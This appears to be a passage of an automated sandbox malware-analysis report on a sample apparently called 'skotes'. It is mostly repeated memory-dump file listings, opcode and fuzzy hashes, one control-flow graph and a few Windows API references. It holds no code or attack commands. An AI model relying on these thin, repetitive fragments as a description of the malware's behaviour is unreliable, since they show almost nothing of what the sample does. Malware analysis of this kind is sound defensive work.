                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0502300e76f9343bb03512885e1fc7a06f22d981009ff4f62ff34466474f8ebe
                                                                                                                                                                                                                                                                                          • Instruction ID: 86d58957d7a7d093add447aabaccb38e1f5f19a2053c4b2ec86fd4b4f941d29f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0502300e76f9343bb03512885e1fc7a06f22d981009ff4f62ff34466474f8ebe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1213D31B452019AF724776BDC8A7FDB651AFC1320F24481AE148DA6D1D67E8841FE53

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 292 fba34f-fba35b 293 fba35d-fba36b 292->293 294 fba371-fba39a call fcd663 292->294 293->294 295 fba93a 293->295 300 fba3c8-fba916 call fc80c0 294->300 301 fba39c-fba3a8 294->301 297 fba953-fba994 Sleep CreateMutexA 295->297 298 fba93a call fe6c6a 295->298 307 fba9a7-fba9a8 297->307 308 fba996-fba998 297->308 298->297 304 fba3aa-fba3b8 301->304 305 fba3be-fba3c5 call fcd663 301->305 304->295 304->305 305->300 308->307 311 fba99a-fba9a5 308->311 311->307
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1dd820a232cfc1eb930d294eb10229599fa2e212d26b85d68f946ed46e0b0d04
                                                                                                                                                                                                                                                                                          • Instruction ID: 420bc0094106f6425d01e83faf0054c0a379eae81fb13a044b5e20efbf18f86c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd820a232cfc1eb930d294eb10229599fa2e212d26b85d68f946ed46e0b0d04
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36219E327002019BEB18AB6DDC89BECB7A1EBC1321F24421DE408DB6D4D77A5580EF52
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 32384418-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
                                                                                                                                                                                                                                                                                          • Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                                          • Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
